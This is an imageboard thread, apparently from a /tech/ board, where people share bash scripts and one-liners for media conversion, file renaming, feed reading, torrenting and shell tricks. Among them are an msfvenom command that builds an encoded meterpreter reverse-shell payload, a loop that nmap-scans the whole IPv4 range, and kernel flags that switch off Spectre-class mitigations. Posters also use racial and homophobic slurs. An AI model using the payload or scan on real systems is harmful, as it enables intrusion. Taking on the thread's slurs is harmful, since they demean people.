# one-liner if bloat bothers you
function cdf() { [[ -f "$(which "$*")" ]] && cd "$(dirname "$(which "$*")")" }


Both Arch and Gentoo are really suck! Actually, Ubuntu or Mint is better.


pretty epic huh

alias lsa='ls -p --quoting-style=escape | grep -v / | xargs -0 -d "\n" -I % file -i % | grep -E "image/[p|j|g]" | awk "{print \$1}" | tr -d \: | sxiv -t -'



alias fuck="sudo !!"



>are really

Illiterate, just like your choice in distro.



Is this bait?




No it doesn't look like it.

If you forgot to use sudo on a command, then it runs the last command (!!) with sudo (sudo !!) by simply typing "fuck".



Because it doesn't work?

 ~$ alias fuck="sudo !!"
~$ alias fuck
alias fuck="sudo <whatever command you entered previously>"
~$ alias fuck='sudo !!'
~$ alias fuck
alias fuck='sudo !!'
~$ fuck
sudo: !!: command not found



>Because it doesn't work?

Not in your shell it doesn't

$echo foo

echo foo

>How do I repeat the last command without using the arrow keys

>With csh or any shell implementing csh-like history substitution (tcsh, bash, zsh):





Since you clearly did not read what I posted, let me type it out for you again:

 ~$ alias fuck="sudo !!"
alias fuck="sudo <whatever command you entered previously>"
 ~$ ls
~$ alias fuck="sudo !!"
alias fuck="sudo ls"
Running bash. The fucking fuck alias doesn't fucking work.



you may have to reference the history file directly then via an evaluation: $(history -p !!) will get the last command in the history (!!) and not run it, effectively it does the substitution dynamically when the alias is executed. Otherwise using the double quotes as you do is a static substitution done once when the alias is defined.

alias fuck='sudo $(history -p !!)'

Note: Use of apostrophes/single quotes (and not double quotes as you're using.)There is a significant difference in the shell interpretation.

$alias fuck='sudo $(history -p !!)'
$echo foo

$alias fuck="sudo $(history -p !!)"
alias fuck="sudo $(history -p <last-command-is-substituted-here>)"






if you want to do the command line meme of setting your alias you have to escape the explanation mark, absolutely low iq










y'all mother fuckers need to stop making scripts and reread the gnu's reference manual on bash.

One you're probably interested in right now is tiltled "history expansion".



History expansion, and especially "!!" doesn't work normally outside of the interactive shell. Saving an alias like that would either save directly the previous command, or it'll just try and execute "!!" which isn't a real command.

As far as alias is concerned your not actually looking for the previous command as it is setup to run actual commands not bash, "!!" is done before execution, not during. so it isn't interpreted that way.

However, you can hack around it in an attempt to make it work, but it's definitly not as simplified as just running an alias.



What the fuck


I made this while drunk to show an irl friend the capabilities of bash and stuff. He destroyed his entire filesystem within a week though

set -e


function exit_error() {
case "${1}" in
notify-send "Could not get YouTube URL"
notify-send "No devices found"
notify-send 'youtube-dl failed to download' "$(xclip -o)"
notify-send "Could not find file in directory"
notify-send "kdeconnect could not send file"
exit 1

mkdir -p ~/Music
cd ~/Music

video_url="$(xclip -o | awk -F"=|&" '{print $2}')"
[[ -z "${video_url}" ]] && exit_error 0

mapfile -t dev_ids < <(kdeconnect-cli -l | awk '/reachable/{print $3}')
[[ ${#dev_ids[@]} -eq 0 ]] && exit_error 1

youtube-dl -x --audio-format vorbis "https://www.youtube.com/watch?v=${video_url}" || exit_error 2
file="$(ls ./*"${video_url}."*)" || exit_error 3

for dev_id in "${dev_ids[@]}"; do
kdeconnect-cli -d "${dev_id}" --share "${file}" || exit_error 4
notify-send 'Success' "Sent ${file} \\nto ${dev_id}"



>set -e

>not set -eu

>not set -eu -o pipefail

Faggots using bash without the only stuff that makes it better than sh should die.



>not #!/bin/bash -eu

Before you start being a nigger about common practises you should actually learn them. There's a ton of problems with my script but like I said I was drunk, faglord.



or even better

>#!/usr/bin/env -S bash -euo pipefail


soxresample(){ input="$1"; res="$2"; output="$3"; sox $input $output rate -v -b 99.7 -M $res;}
# soxresample input.flac 96000 output.flac


xcftoimage(){ input="$1"; output="$2"; gimp -ib "(let* ((image (car (gimp-file-load RUN-INTERACTIVE \"$input\" \"$input\")))(drawable (car (gimp-image-merge-visible-layers image CLIP-TO-IMAGE))))(gimp-file-save RUN-NONINTERACTIVE image drawable \"$output\" \"\"))(gimp-quit 0)";}
# xcftoimage image.xcf image.png



That looks hella complicated for something that should be easy.

for i in *
ffmpeg -y -i "$i" -c:v libvpx-vp9 -b:v xxxk -pass 1 -an -f webm /dev/null
ffmpeg -y -i "$i" -c:v libvpx-vp9 -b:v xxxk -pass 2 -c:a libopus -b:a xxk ../"${i%.*}".webm


for a in {0..255}; do for b in {0..255}; do for c in {0..255}; do for d in {0..255}; do nmap -oG grep.txt -Pn -p XX $a.$b.$c.$d; done; done; done; done



You really shouldn't be doing that in bash



You're right masscan or zmap would be faster. It was an example I had written down.



Did you also write out all permutations for {0..255}.{0..255}.{0..255}.{0..255}?



With that code? Fuck no. It takes about 13 hours with zmap.




wget -qO- 'https://beacon.nist.gov/rest/record/last' \

| sed -E 's/.*<outputValue>(.*)<\/outputValue>.*/\1/' \


shuf \

--head-count 1 \

--input-range 0-1 \

--random-source <(cat <<< "$beacon") \

| sed 's/1/heads/; s/0/tails/'




nmap -p 80



That's some illiteracy.



That the left part is essentially cuckchan desktop threads, while the right part implies intermediate-to-expert Linux/programming experience those on the left usually do not have.


# fallocate -l 32GB drive && lspci

sudo sh -c '
devices=(01:00.0 01:00.1 00:12.0 00:12.2)

for devid in ${devices[@]}; do devid=0000:$devid
echo $(</sys/bus/pci/devices/$devid/vendor) $(</sys/bus/pci/devices/$devid/device) > /sys/bus/pci/drivers/vfio-pci/new_id
echo $devid > /sys/bus/pci/devices/$devid/driver/unbind
echo $devid > /sys/bus/pci/drivers/vfio-pci/bind
echo $(</sys/bus/pci/devices/$devid/vendor) $(</sys/bus/pci/devices/$devid/device) > /sys/bus/pci/drivers/vfio-pci/remove_id

qemu-system-x86_64 -enable-kvm -m 4G -cpu host -smp cores=8,threads=1 -vga none -display none -cdrom windows.iso -drive if=pflash,format=raw,readonly,file=/usr/share/edk2-ovmf/OVMF_CODE.fd -drive if=pflash,format=raw,file=/usr/share/edk2-ovmf/OVMF_VARS.fd -drive file=drive,format=raw $(sed "s/ / -device vfio-pci,host=/g" <<< \ ${devices[@]})

for devid in ${devices[@]}; do devid=0000:$devid
echo 1 > /sys/bus/pci/devices/$devid/remove
echo 1 > /sys/bus/pci/rescan


Is there a good w3m guide?

t. not quite a w3m wizard, but knows enough to make this post with it


>spend half an hour writing ffmpeg wrapper which replaces stuff like <0:s:1> with extracted temporary .ass file, so that I can burn subtitles for use on my phone

>find out that mpv-android is already in usable state and supports ass subtitles, right after I finish the script

Oh well.

What settings do you use for your phone anyway? Or do you just copy over the full encodes?

At least it might be useful subbed webms. I guess, with little work the script could be used to support extracting arbitrary streams too, using something like <stream_specifier-file_extension> instead of the current <stream_specifier> syntax.

function runff() {
echo @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
echo -- ffmpeg "$*"
echo @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ffmpeg -hide_banner "$@"

function get_stream_specs() { grep -o '<[^> ]*>' <<< "$*" | sort -u | sed 's/^<//;s/>$//'; }

# find inputs part of the command line
# note: when i=n, ${!i} is equivalent to $n
inputs=() # ffmpeg input arguments
ninputs=0 # # of last input arg.
for (( i=1; i <= $#; ++i )); do [ "${!i}" = '-i' ] && ninputs=$((i+1)); done
if [ $ninputs -le 1 ];then echo "there are no inputs. exiting"; exit 1; fi
for (( i=1; i <= ninputs; ++i )); do inputs+=("${!i}"); done
echo -- "inputs: " "${inputs[*]}"

# extract used subtitles into separate files
declare -A exported_streams # map of stream_specifier => /path/to/extracted/tmp/file
cmd=("$@") # will contain the final command
for stream_spec in $(get_stream_specs "$*"); do
runff "${inputs[@]}" -map "$stream_spec" "$filename"

# replace the subtitle args with files; do this for each ffmpeg argument separately
for i in "${!cmd[@]}"; do
for stream_spec in $(get_stream_specs "$arg"); do
arg=$(sed "s@<$stream_spec>@${exported_streams[$stream_spec]}@g" <<< "$arg")
runff "${cmd[@]}"
rm "${exported_streams[@]}"




>viewing stuff on smartphone

Bashniggers never dissapoint.



I'm not gonna lug a laptop just so I can watch shit on public transport.



i was so into batch when i was growing up man I made entire animations and UI's batch is so pure and perfect


linux /boot/vmlinuz root=/dev/sda1 ro pti=0 ibrs=0 retp=0 ibpb=0 spectre_v2=off l1tf=off nospec_store_bypass_disable no_stf_barrier



(( $(( $RANDOM % 2 )) )) && echo heads || echo tails

>relying on the US gov for your randomness



$RANDOM is non-standard, and its implementations are usually needlessly suboptimal. Get your randomness from /dev/urandom instead.




flipcoin(){ (($(od -An -N1 /dev/random) % 2)) && echo heads || echo tails;}
# flipcoin


Is there a way to search within rtorrent's ncurses GUI?

I want to switch from transmission to rtorrent but now that I think about it, this is going to get pretty clunky once I have a few torrents on it.



rtorrent needs rutorrent to be usable.



Untrue, I'm seeding 1500 torrents right now with just rtorrent


File: a72015a084e19b0⋯.mp4 (525.35 KB, 360x640, 9:16, Fuck_niggers.mp4)




>at all

Sorry, I'm a white man.



I just realized they aren't saying "fuck niggers" at all because it's backwards.


File: a0860fcdb0df009⋯.webm (316.8 KB, 360x640, 9:16, out2.webm)


I've probably seen that a dozen times and never realized it was reversed before





File: ee3e8cc290d2904⋯.jpg (22.35 KB, 500x384, 125:96, mfw.jpg)


They're saying fuck niggers backwards, then?



Yeah, people in their live stream got them to scream it without them knowing what it really meant. If I remember correctly, their university found out and they got in shit or something.



You have no reason to switch from transmission to rtorrent. In fact, I did the opposite because rtorrent crashed sometimes and is in general bad abandonware without a daemon/client architecture.



rtorrent is one of the worst torrent clients without it. just try to add torrents that arent in the same folder and you will notice how annoying it is. also doing something to a single torrent is almost impossible with the cli if you have thousands torrents in it



rtorrent can max out my connection perfectly, whereas transmission only rarely did it. I even basically ported over my transmission config as far as peer counts and so on are concerned, so I think it's a difference in their torrent implementation.

rtorrent is also many times lighter, I'd say it does a better job for less.

The only thing the rtorrent ncurses UI is missing is a search function, something like htop's filter, or a plain old "forward slash to search", and then it's perfect.

Migrating from transmission is easy, I'm going to keep using this and if I find sorting by name too clunky I'll migrate back.

By the way this is not my first experience with rtorrent, I used to seed from a nintendo wii running debian, however I never consired putting it on my PC.



Rtorrent is supposed to be used on VERY high speed internet connections for their improvement to matter.

>many times lighter

Are you sure? The transmission daemon is very light.

Anyway, you'll only get pain by using rtorrent. Wait until it becomes active again, at least.



i use transmission and its way too heavy for the arm meme board that i run it on. just few torrents will make the whole system unresponsive and the loads are at 100% until the seeding stops


File: b7981481cd54f89⋯.png (2.68 KB, 590x55, 118:11, trans.png)


this is with 10 torrents and total upload speed of them is 50mbps(in isp marketing units)


deepfry(){ input="$1"; iterations="$2"; output="$3"; cp $input $output; for ((n=0;n<$iterations;n++)); do convert $output -quality $(shuf -n1 -i 50-100) _$output; convert _$output -quality $(shuf -n1 -i 50-100) $output; done; rm _$output;}
# deepfry input.jpg 1000 output.jpg



Well, I have a 100KBps up, so it may be why. There's a lightweight transmission USE flag to use less RAM, though. Maybe try Synapse torrent?


File: 71baa46442a96d0⋯.jpg (202.22 KB, 1280x904, 160:113, 8c6881a3278048ce23c39b0f68….jpg)

Though I have been aware of this kind of software for ages, only now did it spring up on my head.

I just emerged midnight commander and nnn, what exactly does a commandline file manager do to improve my efficiency, and which one of these 2 or any others do you recommend?

I'm looking over both and I'm not sure what conclusions to draw from them.



a file manager that cant be used with the mouse is useless. would just use the standard tools like ls cp or mv then. file managers should make doing things with files easy and beating the keyboard to move one file takes much more time than dragging it somewhere with the mouse


File: a2bda00b0084c6a⋯.gif (177.88 KB, 217x217, 1:1, 1550892791548.gif)

Any bash golfers ITT?

I've discovered so far:

<while true;do something;done

>while :;do something;done

<for i in 1 2 3;do something;done

>for i in 1 2 3;{ something;}

<x(){ while :;do something;done;};x

>x()while :;do something;done;x


File: 506379e52214033⋯.png (3.64 KB, 266x36, 133:18, trans.png)


maybe the debian packaged version just sucks. compiled the latest from source and it works much better. would use another distro on it but its an arm board so you cant just dump some random distro in it and have it work


File: 12d635530b58903⋯.jpg (117.12 KB, 960x540, 16:9, 509e7dd0659a1a0e92c1135ea2….jpg)



Yeah, after digging around for a few days I found MC and NNN pretty useless. It seems that tab completion replaces selecting files, find replaces their search function, and anything you might whip up with filters and "add to .tar.gz" & similar shortcuts can be replaced with shell aliases, expansions and regular expressions, and I'm not sure any of those features are faster than typing in commands even if they work on single keybinds.

You're still dealing with an UI of sorts that you have to wade through to do what you want instead of a commandline where you just say what you want.

I did keep NNN installed at least, MC however has a godawful emacs UI and I don't want that shit.



There's Void or ArchARM probably. Debian and its antediluvian packages are a known problem. Search for Debian in Transmission's Issues on Github and you find stuff like https://github.com/transmission/transmission/issues/313

Just switch to Gentoo with a cross-compiler chroot.



Dont meant to derail the thread, but these girls went to a university near me. Pretty sure this was the case. Some stupid athlete nigger came out to give a "powerful statement" about how racism is still alive. This shit happens a lot in Utah. Some local nigger got in a fight with my highschool buddy and claimed my buddy called him nigger. Kid immediately got media attention even though he had threatened my classmate and other students over text to roll up to their house and beat them up.


File: 87ae6aa239c5674⋯.png (98.87 KB, 1366x768, 683:384, shellter.png)

msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 --platform

win HOPURL= EXTENSIONS=stdapi,priv -f raw -o





A bunch of complicated commands and complicated software to edit a textfile and send it via curl/wget. You are a script kiddy and a faggot.


Most of my scripts are just quick macros or really specific to my setup, like printing the last made screenshot according to my naming scheme so i can quickly open the newest one, but I guess these two might be of interest to /tech/.

# Quick and dirty way to read docx documents
unzip -p "$1" word/document.xml | sed -e 's|</w:p>|\n|g; s/<[^>]\+>//g; s/[^[:print:]\n]//g'

# Extracts image URLs from imgur albums so you don't need JS
curl "https://imgur.com/a/$1" 2>/dev/null | sed -e 's/</\n</g' | grep '<div id="......."' | sed -e 's/.*<div id="\(.......\)".*/https:\/\/i.imgur.com\/\1.jpg https:\/\/i.imgur.com\/\1.png/'



The first statement there is a one liner. You're not even familiar with MSF commands and you're calling someone a script kiddy. The irony. Rekt.

But you're right I should automate the entire process. I'm bored of Linux but this shell thread is actually pretty cash.



I think the anon meant why not nc, sed/ed, and perhaps curl?



how does it work

doesn't w3m already have image viewing?



as for writing a downloader

isn't is as simple as using the (web client) module, and then using http-request on the image links of the thread?



onchange () {

while true; do

inotifywait -e close_write $1;




# onchange source.tex pdflatex source.tex


Runs a command whenever the given file changes. In this example, used to recompile a tex file whenever it is saved.



Linux is a kernel.



Just do wget "imgur.com/a/${id}/zip" -O "${id}.zip" and you get the album zipped.

That said, try to find other sources than imgur since imgur is known for reducing jpg quality.


File: d69f37648254207⋯.jpg (38.88 KB, 400x300, 4:3, 1517515637551.jpg)

Been on a system where (p)rename wasn't available and made this in bash:

if [[ "${1}" == '-n' ]]; then shift
regex="${1}"; shift
for file in "${@}"; do
echo mv -v -- "${file}" \
"$(sed -- "${regex}" <<< "${file}")"
regex="${1}"; shift
for file in "${@}"; do
mv -v -- "${file}" \
"$(sed -- "${regex}" <<< "${file}")"

Usage is just like sed:

$ smv 's/jpeg/jpg/' *jpg

-n provides a (no-acting) preview.

Improvements welcome. I guess there's a better way to provide -n without repeating myself <https://en.wikipedia.org/wiki/Don%27t_repeat_yourself>.




I've made several scripts

>godawful complicated interactive script to cut multiple audio segments from videos and combine them into one file (if it works...)

>script to tag audio files (one to do single files at a time, another to do batches of similar files at once)

>script to optimize image files with fancy output

>script to make an Anki deck given video files with .srt or .ass files named similarly (image, audio, line, tags)

The last one entirely replaces programs that I needed hundreds of megabytes of dependencies to run a shitty GUI that couldn't remember default settings. It does shit like remove retarded formatting, badly encoded subs, audio normalization, padding, and is faster than the other programs I tried as well.



could do something like:

if [[ "${1}" == '-n' ]]; then 
CMD="echo mv";
for f in $@; do
$CMD $f `sed $1 <<< $f`;

modulo quoting and so on


Guys, install fish. It's great. This is the first time I have ever used a non-insane shell.

My only complaint is that if your prompt is multiple lines and you ^C to clear a command you started typing, the prompt will overwrite that command on the screen, when I'd prefer if it displayed under the incomplete command's lines.


This thread is probably dead, but something that saves me is this:

function prv
eval $(history 2 | head -n 1 | sed -r 's/ [[:digit:]]* //') # Get second-to-last action


rate="29.97003" # it can be also "23.976024" or "25"
truncate -s %$(($width*$height/($block**2)/8)) $1
ffmpeg -f rawvideo -pix_fmt monob -s $(($width/$block))x$(($height/$block)) \
-r $rate -i $input -vf "scale=iw*${block}:-1" -sws_flags neighbor \
-threads 8 -deadline best -c:v libvpx -b:v 256k $2
input=$1; output=$2; block=8
ffmpeg -i $1 -vf "format=pix_fmts=monob,scale=iw/${block}:-1" \
-sws_flags area -f rawvideo $2



this converts any file into a snowcrash video



GRUB_CMDLINE_LINUX_DEFAULT="pti=off ibrs=off retp=off ibpb=off spectre_v2=off l1tf=off nospec_store_bypass_disable no_stf_barrier" grub-mkconfig -o /boot/grub/grub.cfg



Absolute madman


I made a feed reader for my acme client. It works with JSON feeds only, but you can use another program to turn RSS/Atom feeds into JSON feeds. You do need jq (https://stedolan.github.io/jq/) for it to work at all.

# RSS/Atom/JSON Feed reader for acme
# This code is in the public domain
for url in $(cat /home/parker/bin/URLS)
curl -s $url > $temp
jq -r '.title' $temp
jq -r ' .items | .[] | [.title, .url] | join("\t") ' $temp | sed 11q
echo ==========================================================================
rm $temp
done | 9p write acme/new/body

writetoacme JSON-Feeds

And for anyone interested in the writetoacme function:

# Shortcut for common writing acme applications
# USAGE: writetoacme $1
# $1: name of window
# This code is in the public domain
last=$(9p ls acme | sort -g | tail -n 1)
echo "name $1" | 9p write acme/$last/ctl
echo -n "clean" | 9p write acme/$last/ctl
echo -n "0,0" | 9p write acme/$last/addr
echo -n "dot=addr" | 9p write acme/$last/ctl
echo -n "show" | 9p write acme/$last/ctl



>using echo -n and not printf

Absolutely disgusting. Also, one should ALWAYS use set -eu in his shell scripts.



set -euo pipefail



>bash niggers or zsh/ksg snowflake

If you need more than POSIX sh, use tclsh or scheme.


Made a minimal CloverOS iso: https://0x0.st/zNUZ.txt





Made a few improvements to this. Not POSIX compliant, but most things run bash anyway.

#!/usr/bin/env -S bash -euo pipefail

# Sets display variables for notify-send
# User might vary depending on machine, check /etc/passwd

# Below provides some information when the script exits without completing successfully
function exit_error(){
case "${1}" in
notify-send "${HOME}/Music directory does not exist or cannot be created"
notify-send 'A YouTube URL could not be found in the history'
notify-send 'No kdeconnect devices could be found'
notify-send 'youtube-dl failed to download'
notify-send 'Could not find file in directory'
notify-send 'kdeconnect could not send file'
notify-send 'Required dependencies not found in $PATH' 'Dependencies are kdeconnect, xclip, youtube-dl'
notify-send 'Unable to copy/delete the history database. Permission error?'
exit 1

# Checks for a list of commands to see if they're installed as required by the script
# If any of the commands aren't found it will exit
command -v notify-send &>/dev/null || echo 'notify-send is not in $PATH (provides error reporting)'
command -v kdeconnect-cli &>/dev/null || exit_error 99
command -v xclip &>/dev/null || exit_error 99
command -v youtube-dl &>/dev/null || exit_error 99
command -v sqlite3 &>/dev/null || exit_error 99

# Create the Music directory in $HOME if it does not already exist and changes the current working directory to it
mkdir -p "${HOME}/Music" || exit_error 0
cd "${HOME}/Music" || exit_error 0

# Adds a list of connected and reachable devices listed by kdeconnect to an array
# If none are found it exits
mapfile -t dev_ids < <(kdeconnect-cli -l | awk '/reachable/{print $3}')
(( ${#dev_ids[@]} == 0 )) && exit_error 2

# Searches for a Youtube URL in the firefox cache files
while read -r cache_file; do
video_url="$(grep -aoE 'https://www.youtube.com/watch\?v=[a-zA-Z0-9_-]{11}' "${cache_file}" | grep -oP '[\w-]{11}')" && break
done < <(find "${HOME}"/.cache/mozilla/firefox/*.default/cache2/entries/ -type f -printf '%T@ %p\n' | sort -r | cut -d' ' -f2)

# If no URL was found in the cache files, it will use Firefox's history database to find one
if [[ -z "${video_url}" ]]; then
hist_db="$(find "${HOME}/.mozilla/firefox/" -name "places.sqlite")"
cp "${hist_db}" places-copy.sqlite || exit_error 127

hist_query="select p.url from moz_historyvisits as h, moz_places as p where substr(h.visit_date, 0, 11) >= strftime('%s', date('now')) and p.id == h.place_id order by h.visit_date;"
video_url="$(sqlite3 places-copy.sqlite "${hist_query}" | grep 'youtube.com' | awk -F'=|&' 'BEGIN {err=1} length($2) == 11 {err=0; print $2} END {exit err}' | tail -1)" || exit_error 1

rm places-copy.sqlite

# Downloads the video, converts to vorbis (.ogg) and attempts to find the downloaded vorbis file
youtube-dl -x --audio-format vorbis "https://www.youtube.com/watch?v=${video_url}" &>/dev/null || exit_error 3
file="$(readlink -f <<< ls ./*"${video_url}."*)" || exit_error 4

# Attempts to send the converted file to all kdeconnect devices
for dev_id in "${dev_ids[@]}"; do
kdeconnect-cli -d "${dev_id}" --share "${file}" &>/dev/null || exit_error 5
notify-send 'Success' "Sent ${file}\\nto ${dev_id}"


curl https://8ch.net/tech/res/1003160.html | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | grep file_store | xargs -I{} wget {}

[Return][Go to top][Catalog][Nerve Center][Cancer][Post a Reply]
Delete Post [ ]
[ / / / / / / / / / / / / / ] [ dir / aus / boxxy / choroy / dempart / f / jenny / jp / komica ]